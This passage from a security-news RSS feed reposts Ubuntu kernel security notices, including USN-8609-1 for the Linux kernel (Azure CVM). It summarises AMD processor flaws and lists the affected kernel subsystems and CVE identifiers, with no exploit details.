use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - Clock framework and drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO ADC drivers;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Remote Processor subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - SPI subsystem;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - Cryptographic library;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - IPv6 networking;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - Landlock security;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40135, CVE-2025-40150, CVE-2025-68175, CVE-2025-68239,
CVE-2025-68334, CVE-2025-68736, CVE-2025-71152, CVE-2025-71161,
CVE-2025-71203, CVE-2025-71221, CVE-2025-71269, CVE-2025-71287,
CVE-2025-71288, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23104, CVE-2026-23118,
CVE-2026-23138, CVE-2026-23154, CVE-2026-23157, CVE-2026-23171,
CVE-2026-23207, CVE-2026-23226, CVE-2026-23227, CVE-2026-23244,
CVE-2026-23245, CVE-2026-23246, CVE-2026-23253, CVE-2026-23255,
CVE-2026-23270, CVE-2026-23271, CVE-2026-23276, CVE-2026-23277,
CVE-2026-23279, CVE-2026-23281, CVE-2026-23284, CVE-2026-23285,
CVE-2026-23286, CVE-2026-23287, CVE-2026-23289, CVE-2026-23290,
CVE-2026-23291, CVE-2026-23292, CVE-2026-23293, CVE-2026-23296,
CVE-2026-23298, CVE-2026-23300, CVE-2026-23302, CVE-2026-23303,
CVE-2026-23304, CVE-2026-23306, CVE-2026-23307, CVE-2026-23308,
CVE-2026-23310, CVE-2026-23312, CVE-2026-23313, CVE-2026-23315,
CVE-2026-23317, CVE-2026-23318, CVE-2026-23319, CVE-2026-23321,
CVE-2026-23324, CVE-2026-23325, CVE-2026-23330, CVE-2026-23334,
CVE-2026-23335, CVE-2026-23336, CVE-2026-23339, CVE-2026-23340,
CVE-2026-23343, CVE-2026-23347, CVE-2026-23352, CVE-2026-23356,
CVE-2026-23357, CVE-2026-23359, CVE-2026-23360, CVE-2026-23361,
CVE-2026-23362, CVE-2026-23363, CVE-2026-23364, CVE-2026-23365,
CVE-2026-23367, CVE-2026-23368, CVE-2026-23369, CVE-2026-23370,
CVE-2026-23372, CVE-2026-23374, CVE-2026-23375, CVE-2026-23378,
CVE-2026-23379, CVE-2026-23381, CVE-2026-23382, CVE-2026-23383,
CVE-2026-23386, CVE-2026-23387, CVE-2026-23388, CVE-2026-23389,
CVE-2026-23391, CVE-2026-23395, CVE-2026-23396, CVE-2026-23397,
CVE-2026-23398, CVE-2026-23399, CVE-2026-23401, CVE-2026-23412,
CVE-2026-23413, CVE-2026-23414, CVE-2026-23418, CVE-2026-23419,
CVE-2026-23420, CVE-2026-23426, CVE-2026-23434, CVE-2026-23438,
CVE-2026-23439, CVE-2026-23440, CVE-2026-23441, CVE-2026-23442,
CVE-2026-23444, CVE-2026-23446, CVE-2026-23447, CVE-2026-23448,
CVE-2026-23449, CVE-2026-23452, CVE-2026-23454, CVE-2026-23456,
CVE-2026-23457, CVE-2026-23458, CVE-2026-23460, CVE-2026-23461,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23464, CVE-2026-23465,
CVE-2026-23468, CVE-2026-23470, CVE-2026-23474, CVE-2026-23475,
CVE-2026-31389, CVE-2026-31391, CVE-2026-31392, CVE-2026-31393,
CVE-2026-31394, CVE-2026-31396, CVE-2026-31399, CVE-2026-31400,
CVE-2026-31403, CVE-2026-31405, CVE-2026-31407, CVE-2026-31408,
CVE-2026-31409, CVE-2026-31412, CVE-2026-31413, CVE-2026-31414,
CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31421,
CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31425,
CVE-2026-31426, CVE-2026-31427, CVE-2026-31428, CVE-2026-31429,
CVE-2026-31430, CVE-2026-31432, CVE-2026-31433, CVE-2026-31434,
CVE-2026-31438, CVE-2026-31439, CVE-2026-31440, CVE-2026-31441,
CVE-2026-31446, CVE-2026-31447, CVE-2026-31449, CVE-2026-31450,
CVE-2026-31451, CVE-2026-31452, CVE-2026-31453, CVE-2026-31454,
CVE-2026-31455, CVE-2026-31458, CVE-2026-31464, CVE-2026-31466,
CVE-2026-31467, CVE-2026-31469, CVE-2026-31470, CVE-2026-31473,
CVE-2026-31474, CVE-2026-31476, CVE-2026-31477, CVE-2026-31480,
CVE-2026-31482, CVE-2026-31483, CVE-2026-31485, CVE-2026-31487,
CVE-2026-31488, CVE-2026-31489, CVE-2026-31492, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31496, CVE-2026-31497, CVE-2026-31498,
CVE-2026-31499, CVE-2026-31500, CVE-2026-31502, CVE-2026-31503,
CVE-2026-31505, CVE-2026-31506, CVE-2026-31507, CVE-2026-31508,
CVE-2026-31509, CVE-2026-31510, CVE-2026-31511, CVE-2026-31512,
CVE-2026-31515, CVE-2026-31516, CVE-2026-31518, CVE-2026-31519,
CVE-2026-31520, CVE-2026-31521, CVE-2026-31522, CVE-2026-31523,
CVE-2026-31524, CVE-2026-31525, CVE-2026-31527, CVE-2026-31528,
CVE-2026-31530, CVE-2026-31532, CVE-2026-31540, CVE-2026-31542,
CVE-2026-31545, CVE-2026-31546, CVE-2026-31548, CVE-2026-31549,
CVE-2026-31550, CVE-2026-31551, CVE-2026-31552, CVE-2026-31554,
CVE-2026-31555, CVE-2026-31556, CVE-2026-31557, CVE-2026-31563,
CVE-2026-31565, CVE-2026-31566, CVE-2026-31570, CVE-2026-31575,
CVE-2026-31576, CVE-2026-31577, CVE-2026-31578, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31590, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31602,
CVE-2026-31603, CVE-2026-31604, CVE-2026-31605, CVE-2026-31606,
CVE-2026-31610, CVE-2026-31611, CVE-2026-31612, CVE-2026-31613,
CVE-2026-31615, CVE-2026-31616, CVE-2026-31617, CVE-2026-31618,
CVE-2026-31619, CVE-2026-31622, CVE-2026-31623, CVE-2026-31624,
CVE-2026-31625, CVE-2026-31626, CVE-2026-31627, CVE-2026-31628,
CVE-2026-31629, CVE-2026-31634, CVE-2026-31638, CVE-2026-31639,
CVE-2026-31642, CVE-2026-31645, CVE-2026-31646, CVE-2026-31648,
CVE-2026-31651, CVE-2026-31655, CVE-2026-31656, CVE-2026-31658,
CVE-2026-31660, CVE-2026-31661, CVE-2026-31662, CVE-2026-31664,
CVE-2026-31665, CVE-2026-31667, CVE-2026-31670, CVE-2026-31671,
CVE-2026-31672, CVE-2026-31673, CVE-2026-31674, CVE-2026-31675,
CVE-2026-31677, CVE-2026-31678, CVE-2026-31679, CVE-2026-31680,
CVE-2026-31681, CVE-2026-31683, CVE-2026-31684, CVE-2026-31686,
CVE-2026-31689, CVE-2026-31694, CVE-2026-31695, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31700,
CVE-2026-31701, CVE-2026-31702, CVE-2026-31704, CVE-2026-31705,
CVE-2026-31706, CVE-2026-31707, CVE-2026-31708, CVE-2026-31709,
CVE-2026-31711, CVE-2026-31712, CVE-2026-31714, CVE-2026-31715,
CVE-2026-31716, CVE-2026-31720, CVE-2026-31721, CVE-2026-31722,
CVE-2026-31723, CVE-2026-31724, CVE-2026-31725, CVE-2026-31726,
CVE-2026-31728, CVE-2026-31729, CVE-2026-31730, CVE-2026-31731,
CVE-2026-31737, CVE-2026-31738, CVE-2026-31740, CVE-2026-31741,
CVE-2026-31747, CVE-2026-31748, CVE-2026-31749, CVE-2026-31751,
CVE-2026-31752, CVE-2026-31754, CVE-2026-31755, CVE-2026-31756,
CVE-2026-31758, CVE-2026-31759, CVE-2026-31761, CVE-2026-31762,
CVE-2026-31763, CVE-2026-31767, CVE-2026-31768, CVE-2026-31770,
CVE-2026-31772, CVE-2026-31773, CVE-2026-31778, CVE-2026-31779,
CVE-2026-31780, CVE-2026-31781, CVE-2026-31788, CVE-2026-43007,
CVE-2026-43012, CVE-2026-43013, CVE-2026-43014, CVE-2026-43015,
CVE-2026-43016, CVE-2026-43017, CVE-2026-43018, CVE-2026-43019,
CVE-2026-43020, CVE-2026-43023, CVE-2026-43024, CVE-2026-43025,
CVE-2026-43026, CVE-2026-43027, CVE-2026-43028, CVE-2026-43030,
CVE-2026-43032, CVE-2026-43035, CVE-2026-43036, CVE-2026-43040,
CVE-2026-43041, CVE-2026-43043, CVE-2026-43044, CVE-2026-43046,
CVE-2026-43047, CVE-2026-43049, CVE-2026-43050, CVE-2026-43051,
CVE-2026-43052, CVE-2026-43054, CVE-2026-43056, CVE-2026-43057,
CVE-2026-43058, CVE-2026-43059, CVE-2026-43060, CVE-2026-43061,
CVE-2026-43062, CVE-2026-43064, CVE-2026-43065, CVE-2026-43066,
CVE-2026-43068, CVE-2026-43069, CVE-2026-43072, CVE-2026-43073,
CVE-2026-43074, CVE-2026-43075, CVE-2026-43076, CVE-2026-43079,
CVE-2026-43080, CVE-2026-43081, CVE-2026-43082, CVE-2026-43084,
CVE-2026-43085, CVE-2026-43086, CVE-2026-43088, CVE-2026-43089,
CVE-2026-43091, CVE-2026-43092, CVE-2026-43093, CVE-2026-43094,
CVE-2026-43098, CVE-2026-43099, CVE-2026-43103, CVE-2026-43104,
CVE-2026-43105, CVE-2026-43107, CVE-2026-43109, CVE-2026-43110,
CVE-2026-43111, CVE-2026-43112, CVE-2026-43113, CVE-2026-43119,
CVE-2026-43120, CVE-2026-43129, CVE-2026-43162, CVE-2026-43245,
CVE-2026-43252, CVE-2026-43265, CVE-2026-43281, CVE-2026-43324,
CVE-2026-43327, CVE-2026-43328, CVE-2026-43329, CVE-2026-43330,
CVE-2026-43332, CVE-2026-43333, CVE-2026-43334, CVE-2026-43336,
CVE-2026-43338, CVE-2026-43339, CVE-2026-43340, CVE-2026-43342,
CVE-2026-43343, CVE-2026-43345, CVE-2026-43350, CVE-2026-43355,
CVE-2026-43357, CVE-2026-43359, CVE-2026-43360, CVE-2026-43361,
CVE-2026-43363, CVE-2026-43365, CVE-2026-43366, CVE-2026-43368,
CVE-2026-43370, CVE-2026-43371, CVE-2026-43372, CVE-2026-43373,
CVE-2026-43377, CVE-2026-43380, CVE-2026-43381, CVE-2026-43382,
CVE-2026-43386, CVE-2026-43387, CVE-2026-43395, CVE-2026-43397,
CVE-2026-43405, CVE-2026-43408, CVE-2026-43409, CVE-2026-43411,
CVE-2026-43412, CVE-2026-43413, CVE-2026-43415, CVE-2026-43419,
CVE-2026-43420, CVE-2026-43421, CVE-2026-43424, CVE-2026-43425,
CVE-2026-43426, CVE-2026-43427, CVE-2026-43428, CVE-2026-43429,
CVE-2026-43430, CVE-2026-43432, CVE-2026-43436, CVE-2026-43437,
CVE-2026-43439, CVE-2026-43441, CVE-2026-43445, CVE-2026-43448,
CVE-2026-43449, CVE-2026-43450, CVE-2026-43451, CVE-2026-43452,
CVE-2026-43453, CVE-2026-43455, CVE-2026-43456, CVE-2026-43457,
CVE-2026-43458, CVE-2026-43459, CVE-2026-43466, CVE-2026-43467,
CVE-2026-43468, CVE-2026-43469, CVE-2026-43471, CVE-2026-43472,
CVE-2026-43473, CVE-2026-43475, CVE-2026-43476, CVE-2026-43480,
CVE-2026-43483, CVE-2026-43484, CVE-2026-43488, CVE-2026-43490,
CVE-2026-43491, CVE-2026-43492, CVE-2026-43495, CVE-2026-43496,
CVE-2026-43497, CVE-2026-43499, CVE-2026-43502, CVE-2026-45834,
CVE-2026-45835, CVE-2026-45836, CVE-2026-45838, CVE-2026-45839,
CVE-2026-45840, CVE-2026-45841, CVE-2026-45842, CVE-2026-45843,
CVE-2026-45844, CVE-2026-45845, CVE-2026-45846, CVE-2026-45855,
CVE-2026-45858, CVE-2026-45899, CVE-2026-45911, CVE-2026-45920,
CVE-2026-45924, CVE-2026-45942, CVE-2026-45943, CVE-2026-45956,
CVE-2026-45958, CVE-2026-45985, CVE-2026-45986, CVE-2026-45987,
CVE-2026-45989, CVE-2026-45991, CVE-2026-45994, CVE-2026-45996,
CVE-2026-45997, CVE-2026-45999, CVE-2026-46002, CVE-2026-46003,
CVE-2026-46004, CVE-2026-46005, CVE-2026-46006, CVE-2026-46007,
CVE-2026-46009, CVE-2026-46011, CVE-2026-46012, CVE-2026-46015,
CVE-2026-46016, CVE-2026-46018, CVE-2026-46019, CVE-2026-46021,
CVE-2026-46022, CVE-2026-46023, CVE-2026-46024, CVE-2026-46026,
CVE-2026-46027, CVE-2026-46031, CVE-2026-46033, CVE-2026-46037,
CVE-2026-46038, CVE-2026-46040, CVE-2026-46041, CVE-2026-46044,
CVE-2026-46046, CVE-2026-46047, CVE-2026-46049, CVE-2026-46050,
CVE-2026-46051, CVE-2026-46052, CVE-2026-46053, CVE-2026-46056,
CVE-2026-46058, CVE-2026-46061, CVE-2026-46062, CVE-2026-46063,
CVE-2026-46064, CVE-2026-46065, CVE-2026-46068, CVE-2026-46069,
CVE-2026-46070, CVE-2026-46072, CVE-2026-46073, CVE-2026-46075,
CVE-2026-46076, CVE-2026-46077, CVE-2026-46078, CVE-2026-46079,
CVE-2026-46080, CVE-2026-46082, CVE-2026-46083, CVE-2026-46084,
CVE-2026-46086, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46094, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46101, CVE-2026-46102, CVE-2026-46103,
CVE-2026-46106, CVE-2026-46107, CVE-2026-46108, CVE-2026-46110,
CVE-2026-46111, CVE-2026-46112, CVE-2026-46113, CVE-2026-46114,
CVE-2026-46116, CVE-2026-46117, CVE-2026-46120, CVE-2026-46121,
CVE-2026-46122, CVE-2026-46123, CVE-2026-46124, CVE-2026-46125,
CVE-2026-46126, CVE-2026-46127, CVE-2026-46128, CVE-2026-46129,
CVE-2026-46131, CVE-2026-46132, CVE-2026-46133, CVE-2026-46136,
CVE-2026-46137, CVE-2026-46138, CVE-2026-46139, CVE-2026-46142,
CVE-2026-46143, CVE-2026-46144, CVE-2026-46145, CVE-2026-46146,
CVE-2026-46149, CVE-2026-46150, CVE-2026-46151, CVE-2026-46152,
CVE-2026-46157, CVE-2026-46159, CVE-2026-46160, CVE-2026-46161,
CVE-2026-46163, CVE-2026-46164, CVE-2026-46167, CVE-2026-46168,
CVE-2026-46169, CVE-2026-46172, CVE-2026-46173, CVE-2026-46174,
CVE-2026-46176, CVE-2026-46177, CVE-2026-46178, CVE-2026-46179,
CVE-2026-46180, CVE-2026-46184, CVE-2026-46186, CVE-2026-46187,
CVE-2026-46189, CVE-2026-46190, CVE-2026-46191, CVE-2026-46193,
CVE-2026-46194, CVE-2026-46196, CVE-2026-46197, CVE-2026-46198,
CVE-2026-46199, CVE-2026-46200, CVE-2026-46201, CVE-2026-46204,
CVE-2026-46205, CVE-2026-46206, CVE-2026-46207, CVE-2026-46208,
CVE-2026-46209, CVE-2026-46211, CVE-2026-46212, CVE-2026-46214,
CVE-2026-46218, CVE-2026-46219, CVE-2026-46220, CVE-2026-46225,
CVE-2026-46226, CVE-2026-46227, CVE-2026-46229, CVE-2026-46230,
CVE-2026-46231, CVE-2026-46232, CVE-2026-46233, CVE-2026-46234,
CVE-2026-46235, CVE-2026-46236, CVE-2026-46238, CVE-2026-46241,
CVE-2026-46273, CVE-2026-46274, CVE-2026-46280, CVE-2026-46282,
CVE-2026-46285, CVE-2026-46286, CVE-2026-46287, CVE-2026-46291,
CVE-2026-46292, CVE-2026-46293, CVE-2026-46294, CVE-2026-46296,
CVE-2026-46299, CVE-2026-46301, CVE-2026-46303, CVE-2026-46304,
CVE-2026-46306, CVE-2026-46307, CVE-2026-46312, CVE-2026-46314,
CVE-2026-46319, CVE-2026-52911, CVE-2026-52920, CVE-2026-52925,
CVE-2026-52933, CVE-2026-52936, CVE-2026-52951, CVE-2026-52954,
CVE-2026-52955, CVE-2026-52957, CVE-2026-52958, CVE-2026-52961,
CVE-2026-52962, CVE-2026-52963, CVE-2026-52964, CVE-2026-52967,
CVE-2026-52968, CVE-2026-52969, CVE-2026-52970, CVE-2026-52974,
CVE-2026-52975, CVE-2026-52977, CVE-2026-52981, CVE-2026-52982,
CVE-2026-52984, CVE-2026-52985, CVE-2026-52986, CVE-2026-52989,
CVE-2026-52990, CVE-2026-52992, CVE-2026-52993, CVE-2026-52995,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53001, CVE-2026-53002,
CVE-2026-53003, CVE-2026-53004, CVE-2026-53006, CVE-2026-53011,
CVE-2026-53012, CVE-2026-53013, CVE-2026-53014, CVE-2026-53015,
CVE-2026-53016, CVE-2026-53021, CVE-2026-53022, CVE-2026-53023,
CVE-2026-53032, CVE-2026-53033, CVE-2026-53034, CVE-2026-53035,
CVE-2026-53036, CVE-2026-53037, CVE-2026-53039, CVE-2026-53040,
CVE-2026-53041, CVE-2026-53043, CVE-2026-53045, CVE-2026-53046,
CVE-2026-53047, CVE-2026-53048, CVE-2026-53049, CVE-2026-53050,
CVE-2026-53052, CVE-2026-53056, CVE-2026-53058, CVE-2026-53059,
CVE-2026-53060, CVE-2026-53061, CVE-2026-53062, CVE-2026-53063,
CVE-2026-53064, CVE-2026-53065, CVE-2026-53066, CVE-2026-53068,
CVE-2026-53069, CVE-2026-53071, CVE-2026-53072, CVE-2026-53073,
CVE-2026-53074, CVE-2026-53075, CVE-2026-53076, CVE-2026-53077,
CVE-2026-53082, CVE-2026-53083, CVE-2026-53084, CVE-2026-53085,
CVE-2026-53086, CVE-2026-53088, CVE-2026-53093, CVE-2026-53094,
CVE-2026-53096, CVE-2026-53097, CVE-2026-53098, CVE-2026-53110,
CVE-2026-53111, CVE-2026-53112, CVE-2026-53115, CVE-2026-53117,
CVE-2026-53122, CVE-2026-53123, CVE-2026-53126, CVE-2026-53128,
CVE-2026-53130, CVE-2026-53279, CVE-2026-53287, CVE-2026-53289,
CVE-2026-53291, CVE-2026-53293, CVE-2026-53294, CVE-2026-53295,
CVE-2026-53296, CVE-2026-53303, CVE-2026-53304, CVE-2026-53306,
CVE-2026-53309, CVE-2026-53314, CVE-2026-53320, CVE-2026-53369,
CVE-2026-53374, CVE-2026-53375, CVE-2026-53376, CVE-2026-53379,
CVE-2026-63838, CVE-2026-63843, CVE-2026-63844, CVE-2026-63845,
CVE-2026-63846, CVE-2026-63847, CVE-2026-63848, CVE-2026-63851,
CVE-2026-63852, CVE-2026-63854, CVE-2026-63855, CVE-2026-63856,
CVE-2026-63860, CVE-2026-63861, CVE-2026-63862, CVE-2026-63865,
CVE-2026-64018, CVE-2026-64034, CVE-2026-64164)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8609-1: Linux kernel (Azure CVM) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3691495/unix-server/usn-8609-1-linux-kernel-azure-cvm-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691495/unix-server/usn-8609-1-linux-kernel-azure-cvm-vulnerabilities/</guid>
<pubDate>Fri, 24 Jul 2026 14:17:37 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - MIPS architecture;
  - PowerPC architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - ATM drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - RNBD block device driver;
  - Ublk userspace block driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - TPM device driver;
  - Clock framework and drivers;
  - Clocksource drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - CPU idle management framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPIO subsystem;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO subsystem;
  - IIO ADC drivers;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IOMMU subsystem;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Multifunction device drivers;
  - Broadcom VK accelerator driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MOST (Media Oriented Systems Transport) drivers;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Performance monitor drivers;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Power supply drivers;
  - RapidIO drivers;
  - RAS (Reliability, Availability, Serviceability) subsystem;
  - Remote Processor subsystem;
  - RPMSG subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - MediaTek SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - Texas Instruments SoC drivers;
  - SPI subsystem;
  - Greybus lights staging drivers;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - ChipIdea USB driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - DesignWare USB3 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - USB over IP driver;
  - vDPA drivers;
  - VFIO drivers;
  - Virtio Host (VHOST) subsystem;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FAT file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - JFS file system;
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Proc file system;
  - Pstore file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Audit subsystem;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IPv6 networking;
  - IP tunnels definitions;
